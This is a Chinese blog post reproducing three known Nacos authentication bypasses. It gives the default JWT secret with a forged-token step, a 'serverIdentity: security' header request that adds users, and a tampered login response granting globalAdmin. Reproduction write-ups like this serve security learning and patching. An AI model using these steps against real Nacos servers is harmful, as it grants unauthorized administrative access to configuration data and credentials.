我遇到的Nacos漏洞,复现合集

于 2024-08-10 11:38:55 发布
阅读量613 收藏 7
点赞数 9
文章标签: 网络 笔记 web安全 网络安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52849046/article/details/141085746
版权

前言

Nacos 是阿里巴巴开源的一个微服务平台,集成了服务注册与发现、动态配置管理和服务管理功能。它旨在帮助开发者更便捷地构建、交付和管理微服务项目。Nacos 具有简单易用、高效、灵活的特点,支持动态刷新配置,无需重启服务器即可使配置变更生效。

简介

这些Nacos的漏洞是小编护网期间碰到最多的Nacos漏洞,其他的漏洞不怎么多就不写了,这篇文章漏洞复现是小编参考一些大佬文章写的,太久了,不记得是哪几篇文章了。由于本篇文章是真实环境测试,所以图片有些都打上了马赛克。如有雷同,请联系小编。

权限绕过登陆(QVD-2023-6271)

漏洞简介

Nacos用户使用默认JWT密钥导致未授权访问漏洞.通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户.

影响版本

0.1.0<= Nacos<= 2.2.0

漏洞复现

1.进入容器找默认密钥,或者去网上找Nacos默认密钥

默认密钥:SecretKey012345678901234567890123456789012345678901234567890123456789

2.利用jwt.io构造jwt token

Nacos配置JWT(JSON Web Tokens)作为其认证机制,其中JWT的签名算法选择为HS256(HMAC使用SHA-256哈希算法)。在这个场景下,将secret.key的默认值设定为JWT的密钥(secretKey),用于生成签名(Signature)。JWT的负载(Payload)部分包含两个关键信息:subject(即用户名,标识用户身份)和exp(表示过期时间,用于控制token的有效期限)。

Payload

{

  "sub": "nacos",                         //用户名

  "exp":"1722393819"             //时间戳

}           

Jwt构造网站

JSON Web Tokens - jwt.io

时间戳生成网站

时间戳(Unix timestamp)转换工具 - 在线工具

我的时间现在是2024-7-30,生成一个明天的时间戳,就是把30改为31

然后bp抓一个登陆包发送到重放模块,添加Authorization: Bearer (jwt)后放行

在抓一个登陆包,添加Authorization: Bearer (jwt)后放行,成功登录

CVE-2021-29441 Nacos权限认证绕过漏洞

1,漏洞产因


当开启 Nacos 权限认证(nacos.core.auth.enabled=true)后,配置文件中存在默认值:

nacos.core.auth.server.identity.key=serverIdentity
nacos.core.auth.server.identity.value=security

该硬编码导致攻击者可以构造携带该 key 和 value 的请求,从而绕过权限认证。

2.漏洞影响版本

Nacos <= 2.2.0

3.复现

抓取一个登陆包,然后修改包里内容和请求,添加用户

POST /v1/auth/users HTTP/1.1                    //修改请求
serverIdentity: security //添加身份认证密钥

尝试登录

成功

 CVE-2021-43116(身份认证绕过漏洞

1,漏洞产因

Alibaba nacos 2.0.3 版本的访问提示页面存在访问控制错误漏洞。攻击者可利用该漏洞通过输入用户名和密码、点击“登录”获取数据包,并通过更改返回的数据包进行登录。

2.漏洞影响版本

 Nacos v2.0.3 

3.漏洞复现

Burp抓取页面登录包

拦截页面响应包

点击放行后获得响应包

修改响应包

加入一串代码是一个JSON格式的数据,它通常用于表示一些配置信息或用户认证信息。下面是对这个JSON数据的解释:

  • 一个用户的访问令牌(accessToken),该令牌具有过期时间。
  • 令牌的有效期是18秒(尽管这个值可能较短,实际中会更长)。
  • 用户具有全局管理员权限(globalAdmin为true)。

HTTP/1.1 200

Vary: Origin

Vary: Access-Control-Request-Method

Vary: Access-Control-Request-Headers

Content-Security-Policy: script-src 'self'

Content-Type: application/json

Date: Tue, 06 Feb 2024 12:00:53 GMT

Connection: close

Content-Length: 177

{

  "accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA",

  "tokenTtl":18000,

  "globalAdmin":true,

}

修改完成后,放行,登陆成功

信安白two
关注
  • 9
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
nacos-server合集.zip
08-09
nacos-server合集1.4.2、2.0.1、2.0.2,相关文章:微服务一、SpringCloudAlibaba(2021版本)+Nacos-从零开始、安装、配置、使用和父子项目搭建:https://blog.csdn.net/qq_44695727/article/details/117998412
Nacos2.2.2增加鉴权配置,防止NACOS身份登陆绕过漏洞
06-04
Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service的首字母简称,一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。 Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组...
NACOS搭建及相关漏洞复现
B_l_a_nk的博客
10-30 1065
身份认证绕过漏洞 (QVD-2023-6271) Nacos权限认证绕过(CVE-2021-29441) 信息泄露
Nacos漏洞总结复现
dzqxwzoe的博客
03-01 2621
Nacos中发现影响Nacos
NACOS漏洞深入解析(审计+复现
qq_49849300的博客
03-27 4932
目前攻防对抗实战中,Nacos的环境遇到非常多,并且无一例外都没有开启auth,很多防守方甚至只是用防火墙阻断网上公开的那几条exp利用的关键地址,Nacos里面保存了企业很多的配置文件比如数据库连接信息、AK/SK信息等等,拿到账号密码等信息之后用来做密码本,然后再进行内网横向,杀伤力非常之大。看一下/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigController.java文件中369行开始的代码。
Nacos身份绕过漏洞(QVD-2023-6271)复现学习
crowsec
03-17 7006
Nacos身份绕过漏洞(QVD-2023-6271)复现学习
上心师傅的思路分享(三)--Nacos渗透
记录开发和安全学习过程中的点点滴滴
06-10 1556
Nacos 是阿里巴巴推出来的一个开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。但是Nacos是部署在内网的,因此下面通过语法搜索出来的可以看到的,一般会做访问限制的,正常是访问不到的,如果可以访问就可以尝试是否存在漏洞了.当然如果直接在真实环境下测试,一是未授权行为,二是不容易找到复现环境,所以在本地搭建环境来进行复现是最安全,也是最容易。
NACOS身份认证绕过漏洞
maverickpig的博客
01-27 1103
Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞
【认证绕过】NACOS身份认证绕过漏洞分析
m0_61572518的博客
04-12 6705
工作中遇到一个nacos服务认证绕过的问题,在此总结一下漏洞原因。
Nacos Derby从SQL到RCE
从小白成长为高级安全专家
07-16 1076
derby路径下的函数如下,该方法主要用于Derby数据库的查询操作,确保只执行SELECT语句,并在必要时添加分页限制。如果当前存储模式不是 Derby 或者遇到异常,方法会返回相应的错误信息。在Java应用程序中使用JDBC API调用Derby的存储过程和函数会触发相应的函数执行。
Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)
m0_52400001的博客
03-18 7931
前言 Spring Cloud Gateway远程代码执行漏洞安全公告。该漏洞为当Spring Cloud Gateway启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。 这里花不多说开始复现,感谢大家对MHcloud的支持,这篇文章本来早就该写的,但是因为一些事耽误了,现在补上! 1.漏洞有影响版本 Spring Cloud Gateway < 3.1.1
Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞的检测).zip
03-05
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用!...Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用).zip
Nacos漏洞综合利用GUI工具(完整源码+说明)(身份认证绕过漏洞、反序列化漏洞的检测及其利用).zip
03-27
【资源说明】 1、该资源内项目代码都是经过测试运行成功,功能正常的情况下才上传...Nacos漏洞综合利用GUI工具(源码+项目说明)(集成默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用).zip
NACOS身份认证绕过漏洞批量检测poc.7z
02-24
然而,如同任何复杂的软件系统,NACOS也可能存在安全漏洞,其中之一就是“身份认证绕过漏洞”。 身份认证绕过漏洞通常指的是攻击者可以通过某种方式规避系统的身份验证机制,直接访问或操作本应受保护的资源。在...
【随笔】VRRP+MSTP
weixin_41997073的博客
08-06 330
VRRP 使用选择策略从路由器组中选出一台作为主控,负责 ARP 响应和 IP 数据包转发,组中的其他路由器作为备份的角色处于待命状态。当主控空路由发生故障时,备份路由器能在几秒的时间延后升级的主路由器。一个VRRP组中只能由一台处于主控角色的路由器,可以有一个或多个备份角色的路由器。开销值越低,表示该链路的传输速度越快,路由器会优先选择这些链路进行数据传输。抢占模式的意义, 当 R1 路由器中断又恢复后,则恢复 R1 的主导地位。设计采用主备模式,将VRRP组内多个路由设备都映射为一个虚拟路由设备。
SSH 和 Telnet 之间的区别
ITmoster的博客
08-08 285
SSH 和 Telnet是帮助用户与远程系统建立连接的两种通信协议,这些通信协议决定了数据如何在网络上的不同设备之间传输,这些设备通常需要通过各种物理和数字环境进行传输,网络协议的主要目标是通信、网络管理和安全
网络药理学:autodock tool(mgltools)实现大分子蛋白(PDB ID已知)和小分子配体的分子快速实践流程总结
最新发布
zhiaidaidai的博客
08-08 142
这里是快速实践的流程总结版(正文步骤都需要在中进行)。pocasaPDB。
【haproxy】haproxy基本配置信息
m0_64570996的博客
08-08 921
就是通过发布三层的IP地址(MIP),然后加四层的端口号,来决定哪些流量需要做负载均衡,对需要处理的流量进行NAT处理,转发至后台服务器,并记录下这个TCP或者UDP的流量是由哪台服务器处理的,后续这个连接的所有流量都同样转发到同一台服务器处理。所谓的四到七层负载均衡,就是在对后台的服务器进行负载均衡时,依据四层的信息或七层的信息来决定怎么样转发流量。Webserver1---172.25.254.10--下载ngnix!Webserver2---172.25.254.20--下载ngnix!
nacos漏洞如何触发
06-03
Nacos存在多个漏洞,不同的漏洞触发方式也不同。以下是一些常见的漏洞触发方式: 1. 认证绕过漏洞:攻击者可以通过构造恶意请求,绕过Nacos的身份认证机制,进而获取敏感信息或者执行未授权操作。 2. SQL注入漏洞:攻击者可以通过在请求参数中注入恶意SQL语句,来执行非授权的数据库操作,包括敏感数据泄露、数据库删除等。 3. 信息泄露漏洞:攻击者可以通过发送恶意请求,获取Nacos中存储的敏感信息,如用户名、密码、密钥等。 4. 任意文件读取漏洞:攻击者可以通过构造恶意请求,读取Nacos服务器上的任意文件,包括敏感的配置文件、日志文件等。 5. 任意文件写入漏洞:攻击者可以通过构造恶意请求,将恶意文件写入到Nacos服务器上,进而执行任意代码。 总之,Nacos漏洞的触发方式多种多样,攻击者可以通过各种手段来攻击Nacos服务器。因此,在使用Nacos时,必须要加强安全措施,包括加强密码管理、限制访问权限等,以避免可能的安全风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值